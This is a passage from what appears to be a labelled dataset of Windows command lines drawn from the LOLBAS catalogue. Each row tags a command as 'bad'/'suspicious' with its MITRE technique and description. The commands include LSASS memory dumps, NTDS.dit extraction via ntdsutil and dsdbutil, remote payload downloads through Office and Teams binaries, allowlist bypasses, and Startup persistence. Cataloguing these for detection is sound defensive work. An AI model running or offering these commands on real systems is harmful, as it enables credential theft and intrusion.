SQLDmprXXXX.mdmp).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 901941db88dde9c6d9253eeb,sqldumper.exe 540 0 0x01100:40,sqldumper.exe 540 0 0x01100:40,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Sqldumper.yml,Sqldumper.exe,Dump,"[""T1003.001""]",Windows,0.85,False,0x01100:40 flag will create a Mimikatz compatible dump file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f1370adce1df5f2f9669d30d,Remote.exe /s {PATH:.exe} anythinghere,Remote.exe /s {PATH:.exe} anythinghere,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Remote.yml,Remote.exe,AWL Bypass,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Spawns specified executable as a child process of remote.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f159929481e72edc6b627e0d,Remote.exe /s {PATH_SMB:.exe} anythinghere,Remote.exe /s {PATH_SMB:.exe} anythinghere,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Remote.yml,Remote.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}, {""Execute"": ""Remote""}]",Windows,0.85,False,Run a remote file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 20dccc94cb7873025f717de2,"dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""create"" ""quit"" ""quit""","dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""create"" ""quit"" ""quit""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dsdbutil.yml,dsdbutil.exe,Dump,"[""T1003.003""]","Windows Server 2012, Windows Server 2016, Windows Server 2019",0.85,False,dsdbutil supports VSS snapshot creation,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 826a446d7d59d4bdc9a72f8c,"dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""mount {GUID}"" ""quit"" ""quit""","dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""mount {GUID}"" ""quit"" ""quit""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dsdbutil.yml,dsdbutil.exe,Dump,"[""T1003.003""]","Windows Server 2012, Windows Server 2016, Windows Server 2019",0.85,False,Mounting the snapshot with its GUID,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c0f20774a3bc73feb31fb0a4,"dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""delete {GUID}"" ""quit"" ""quit""","dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""delete {GUID}"" ""quit"" ""quit""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dsdbutil.yml,dsdbutil.exe,Dump,"[""T1003.003""]","Windows Server 2012, Windows Server 2016, Windows Server 2019",0.85,False,Deletes the mount of the snapshot,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d32d84ff835930d3abadb13a,"dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""create"" ""list all"" ""mount 1"" ""quit"" ""quit""","dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""create"" ""list all"" ""mount 1"" ""quit"" ""quit""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dsdbutil.yml,dsdbutil.exe,Dump,"[""T1003.003""]","Windows Server 2012, Windows Server 2016, Windows Server 2019",0.85,False,Mounting with snapshot identifier,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5f63d1df208a9c12f8592efc,"dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""list all"" ""delete 1"" ""quit"" ""quit""","dsdbutil.exe ""activate instance ntds"" ""snapshot"" ""list all"" ""delete 1"" ""quit"" ""quit""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dsdbutil.yml,dsdbutil.exe,Dump,"[""T1003.003""]","Windows Server 2012, Windows Server 2016, Windows Server 2019",0.85,False,Deletes the mount of the snapshot,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7a9e97139e03b9fcc2087184,pixtool.exe launch {PATH_ABSOLUTE:.exe},pixtool.exe launch {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Pixtool.yml,Pixtool.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Launches an executable via PIX command-line utility.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6649806a6e375fb11f456b5e,windbg.exe -g {CMD},windbg.exe -g {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/WinDbg.yml,WinDbg.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,Launches a command line through the debugging process; optionally add `-G` to exit the debugger automatically.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review be4fe607ddf1de4669ce4eb1,Update.exe --download {REMOTEURL},Update.exe --download {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,Download,"[""T1218""]",Windows 7 and up with Microsoft Teams installed,0.85,False,The above binary will go to url and look for RELEASES file and download the nuget package.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac01f94dea4309ba4e472b73,Update.exe --update={REMOTEURL},Update.exe --update={REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,AWL Bypass,"[""T1218"", {""Execute"": ""Nuget""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"The above binary will go to url and look for RELEASES file, download and install the nuget package.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0683f0993fae04bb2ce9fe63,Update.exe --update={PATH_SMB:folder},Update.exe --update={PATH_SMB:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,AWL Bypass,"[""T1218"", {""Execute"": ""Nuget""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review de995e75f90e440f5f984a81,Update.exe --updateRollback={REMOTEURL},Update.exe --updateRollback={REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,AWL Bypass,"[""T1218"", {""Execute"": ""Nuget""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"The above binary will go to url and look for RELEASES file, download and install the nuget package.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 95aba17ba220e46243a0c7c3,"Update.exe --processStart {PATH:.exe} --process-start-args ""{CMD:args}""","Update.exe --processStart {PATH:.exe} --process-start-args ""{CMD:args}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,AWL Bypass,"[""T1218"", {""Execute"": ""CMD""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 35c2ff8f7372b74689d8314a,Update.exe --updateRollback={PATH_SMB:folder},Update.exe --updateRollback={PATH_SMB:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,AWL Bypass,"[""T1218"", {""Execute"": ""Nuget""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cdd4f2ec843dc442b6941296,Update.exe --createShortcut={PATH:.exe} -l=Startup,Update.exe --createShortcut={PATH:.exe} -l=Startup,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,Execute,"[""T1547"", {""Execute"": ""EXE""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"Copy your payload into ""%localappdata%\Microsoft\Teams\current\"". Then run the command. Update.exe will create a shortcut to the specified executable in ""%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"". Then payload will run on every login of the user who runs it.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3c623a1f6f873c2378efeb5a,Update.exe --removeShortcut={PATH:.exe}-l=Startup,Update.exe --removeShortcut={PATH:.exe}-l=Startup,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Update.yml,Update.exe,Execute,"[""T1070"", {""Execute"": ""EXE""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"Run the command to remove the shortcut created in the ""%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"" directory you created with the LolBinExecution ""--createShortcut"" described on this page.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df9e7199e0fc06357ebd8ba9,"xbootmgr.exe -trace ""{boot|hibernate|standby|shutdown|rebootCycle}"" -callBack {PATH:.exe}","xbootmgr.exe -trace ""{boot|hibernate|standby|shutdown|rebootCycle}"" -callBack {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/XBootMgr.yml,XBootMgr.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]",Windows,0.85,False,Executes an executable after the trace is complete using the callBack parameter.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bf44b789245fe74e3d616ef1,"xbootmgr.exe -trace ""{boot|hibernate|standby|shutdown|rebootCycle}"" -preTraceCmd {PATH:.exe}","xbootmgr.exe -trace ""{boot|hibernate|standby|shutdown|rebootCycle}"" -preTraceCmd {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/XBootMgr.yml,XBootMgr.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]",Windows,0.85,False,Executes an executable before each trace run using the preTraceCmd parameter.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2ec963e8f7cb94fae1f33852,VSLaunchBrowser.exe .exe {REMOTEURL:.exe},VSLaunchBrowser.exe .exe {REMOTEURL:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VsLaunchBrowser.yml,VSLaunchBrowser.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Download and execute payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f966d804d49d31c9fa00cf0a,VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe},VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VsLaunchBrowser.yml,VSLaunchBrowser.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Execute payload via VSLaunchBrowser as parent process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 37c47826fc4bcfbe5b44146f,VSLaunchBrowser.exe .exe {PATH_SMB},VSLaunchBrowser.exe .exe {PATH_SMB},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VsLaunchBrowser.yml,VSLaunchBrowser.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}, {""Execute"": ""Remote""}]",Windows,0.85,False,Execute payload from WebDAV server via VSLaunchBrowser as parent process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8a7aeb44cba6cb90a1e46e26,MsoHtmEd.exe {REMOTEURL},MsoHtmEd.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/MsoHtmEd.yml,MsoHtmEd.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 96cf7e47242614e093588c88,"IntelliTrace.exe launch /cp:""collectionplan.xml"" /f:""c:\users\public\log"" ""C:\Windows\System32\calc.exe""","IntelliTrace.exe launch /cp:""collectionplan.xml"" /f:""c:\users\public\log"" ""C:\Windows\System32\calc.exe""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/IntelliTrace.yml,IntelliTrace.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Launches an executable via Visual Studio command line utility.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dd48bacadfacd7d7016090b3,MSAccess.exe {REMOTEURL},MSAccess.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msaccess.yml,MSAccess.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a700fd84930f474fe97cf799,"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=""{PATH_ABSOLUTE:.bat}""","msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=""{PATH_ABSOLUTE:.bat}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msdeploy.yml,Msdeploy.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server",0.85,False,Launch .bat file via msdeploy.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6ec2868910dd13e8fabb0f59,msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext},msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msdeploy.yml,Msdeploy.exe,Copy,"[""T1105""]","Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server",0.85,False,Copy file from source to destination.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 70dc03ddd377b36726beca31,"VSIISExeLauncher.exe -p {PATH:.exe} -a ""{CMD:args}""","VSIISExeLauncher.exe -p {PATH:.exe} -a ""{CMD:args}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VSIISExeLauncher.yml,VSIISExeLauncher.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]",Windows 10 and up with VS/VScode installed,0.85,False,The above binary will execute other binary.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8e53d96217a0be6624a467e3,devtunnel.exe host -p 8080,devtunnel.exe host -p 8080,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/devtunnels.yml,devtunnel.exe,Download,"[""T1105""]","Windows 10, Windows 11, MacOS",0.85,False,Enabling a forwarded port for locally hosted service at port 8080 to be exposed on the internet.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9e97a463aec7e2a3401ba1c9,VisualUiaVerifyNative.exe,VisualUiaVerifyNative.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VisualUiaVerifyNative.yml,VisualUiaVerifyNative.exe,AWL Bypass,"[""T1218"", {""Execute"": "".NetObjects""}]",Windows 10 2004 (likely previous and newer versions as well),0.85,False,Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ba2ca1088f3706230123aab,createdump.exe -n -f {PATH:.dmp} {PID},createdump.exe -n -f {PATH:.dmp} {PID},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Createdump.yml,Createdump.exe,Dump,"[""T1003""]","Windows 10, Windows 11",0.85,False,"Dump process by PID and create a minidump file. If ""-f dump.dmp"" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6307f2487405cfe1b93939b0,msxsl.exe {PATH:.xml} {PATH:.xsl},msxsl.exe {PATH:.xml} {PATH:.xsl},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msxsl.yml,msxsl.exe,Execute,"[""T1220"", {""Execute"": ""XSL""}]",Windows,0.85,False,Run COM Scriptlet code within the script.xsl file (local).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b5252c4847f400ea5ebcaeec,msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl},msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msxsl.yml,msxsl.exe,Execute,"[""T1220"", {""Execute"": ""XSL""}, {""Execute"": ""Remote""}]",Windows,0.85,False,Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 697a8555486caa71b8d6864d,msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml},msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msxsl.yml,msxsl.exe,AWL Bypass,"[""T1220"", {""Execute"": ""XSL""}, {""Execute"": ""Remote""}]",Windows,0.85,False,Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 81dbf8d66c533a6e1a6f8687,msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH},msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msxsl.yml,msxsl.exe,Download,"[""T1105""]",Windows,0.85,False,"Using remote XML and XSL files, save the transformed XML file to disk.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fcf6d5d8052fd33b563e95fe,msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name,msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Msxsl.yml,msxsl.exe,ADS,"[""T1564""]",Windows,0.85,False,"Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 116e1a330bf6826c5d40dd6a,"AgentExecutor.exe -powershell ""{PATH_ABSOLUTE:.ps1}"" ""{PATH_ABSOLUTE:.1.log}"" ""{PATH_ABSOLUTE:.2.log}"" ""{PATH_ABSOLUTE:.3.log}"" 60000 ""C:\Windows\SysWOW64\WindowsPowerShell\v1.0"" 0 1","AgentExecutor.exe -powershell ""{PATH_ABSOLUTE:.ps1}"" ""{PATH_ABSOLUTE:.1.log}"" ""{PATH_ABSOLUTE:.2.log}"" ""{PATH_ABSOLUTE:.3.log}"" 60000 ""C:\Windows\SysWOW64\WindowsPowerShell\v1.0"" 0 1",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Agentexecutor.yml,AgentExecutor.exe,Execute,"[""T1218"", {""Execute"": ""PowerShell""}]",Windows 10,0.85,False,Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1979f7e7109e8844998efcc9,"AgentExecutor.exe -powershell ""{PATH_ABSOLUTE:.ps1}"" ""{PATH_ABSOLUTE:.1.log}"" ""{PATH_ABSOLUTE:.2.log}"" ""{PATH_ABSOLUTE:.3.log}"" 60000 ""{PATH_ABSOLUTE:folder}"" 0 1","AgentExecutor.exe -powershell ""{PATH_ABSOLUTE:.ps1}"" ""{PATH_ABSOLUTE:.1.log}"" ""{PATH_ABSOLUTE:.2.log}"" ""{PATH_ABSOLUTE:.3.log}"" 60000 ""{PATH_ABSOLUTE:folder}"" 0 1",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Agentexecutor.yml,AgentExecutor.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]",Windows 10,0.85,False,"If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4585cfa4a35f36968148a10d,Vsjitdebugger.exe {PATH:.exe},Vsjitdebugger.exe {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Vsjitdebugger.yml,vsjitdebugger.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Executes specified executable as a subprocess of Vsjitdebugger.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b6cab90829c3ad318e996e1,DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full,DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/DumpMinitool.yml,DumpMinitool.exe,Dump,"[""T1003.001""]","Windows 10, Windows 11",0.85,False,Creates a memory dump of the lsass process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 88b0678a4714d1926939e1a0,rcsi.exe {PATH:.csx},rcsi.exe {PATH:.csx},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Rcsi.yml,rcsi.exe,Execute,"[""T1127"", {""Execute"": ""CSharp""}]",Windows,0.85,False,Use embedded C# within the csx script to execute the code.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 499e609537cfa97044698081,Excel.exe {REMOTEURL},Excel.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Excel.yml,Excel.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ebfb42e497e895b1862c4a00,"ntdsutil.exe ""ac i ntds"" ""ifm"" ""create full c:\"" q q","ntdsutil.exe ""ac i ntds"" ""ifm"" ""create full c:\"" q q",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Ntdsutil.yml,ntdsutil.exe,Dump,"[""T1003.003""]",Windows,0.85,False,Dump NTDS.dit into folder,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5314cf366d28dc9ba910ee1a,"bcp ""SELECT payload_data FROM database.dbo.payloads WHERE id=1"" queryout ""C:\Windows\Temp\payload.exe"" -S localhost -T -c","bcp ""SELECT payload_data FROM database.dbo.payloads WHERE id=1"" queryout ""C:\Windows\Temp\payload.exe"" -S localhost -T -c",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Bcp.yml,Bcp.exe,Download,"[""T1105""]",Windows,0.85,False,Export binary payload stored in SQL Server database to file system.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e8043370cda6b10a55b21a13,xbootmgrsleep.exe 1000 {PATH:.exe},xbootmgrsleep.exe 1000 {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/XBootMgrSleep.yml,XBootMgrSleep.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]",Windows,0.85,False,"Execute executable via XBootMgrSleep, with a 1 second (=1000 milliseconds) delay. Alternatively, it is also possible to replace the delay with any string for immediate execution.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9e323365d712525f2abe809a,"AccCheckConsole.exe -window ""Untitled - Notepad"" {PATH_ABSOLUTE:.dll}","AccCheckConsole.exe -window ""Untitled - Notepad"" {PATH_ABSOLUTE:.dll}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/AccCheckConsole.yml,AccCheckConsole.exe,Execute,"[""T1218"", {""Execute"": ""DLL (.NET)""}]",Windows,0.85,False,Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8bdce779106977fbf64b0303,"logger.exe RUN ""{CMD}""","logger.exe RUN ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Logger.yml,Logger.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows,0.85,False,Executes the command specified after the `RUN` parameter as a child of `logger.exe`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 26df118cfd7d0e04147aba83,"logger.exe RUNW ""{CMD}""","logger.exe RUNW ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Logger.yml,Logger.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows,0.85,False,Executes the command specified after the `RUNW` parameter as a child of `logger.exe`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review abe73804c53aadf064a2c886,"logger.exe ""{CMD}""","logger.exe ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Logger.yml,Logger.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows,0.85,False,Executes the command specified as a child of `logger.exe`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ffcb914db2ccc117e88cbb0a,WFMFormat.exe,WFMFormat.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/WFMFormat.yml,WFMFormat.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}, {""Requires"": "".NET Framework 3.5""}]","Windows 10, Windows 11",0.85,False,"Executes the file `tracerpt.exe` in the same folder as `WFMFormat.exe`. If the file `dumpfile.txt` (any content) exists in the current working directory, no arguments are required. Note that `WFMFormat.exe` requires .NET Framework 3.5.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ecb03207a86682461c251174,dnx.exe {PATH_ABSOLUTE:folder},dnx.exe {PATH_ABSOLUTE:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dnx.yml,dnx.exe,Execute,"[""T1127"", {""Execute"": ""CSharp""}]",Windows,0.85,False,Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review da120c19de72cd500685e1f1,dump64.exe {PID} out.dmp,dump64.exe {PID} out.dmp,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dump64.yml,Dump64.exe,Dump,"[""T1003.001""]","Windows 10, Windows 11",0.85,False,Creates a memory dump of the LSASS process.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c004a18f0fc34133a5af510c,adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet,adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Adplus.yml,adplus.exe,Dump,"[""T1003.001""]",All Windows,0.85,False,Creates a memory dump of the lsass process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8bd8f841742b6ab8039884e4,adplus.exe -c {PATH:.xml},adplus.exe -c {PATH:.xml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Adplus.yml,adplus.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",All Windows,0.85,False,Execute arbitrary commands using adplus config file (see Resources section for a sample file).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5caab676f69bc1dd29674bb0,"adplus.exe -crash -o ""{PATH_ABSOLUTE:folder}"" -sc {PATH:.exe}","adplus.exe -crash -o ""{PATH_ABSOLUTE:folder}"" -sc 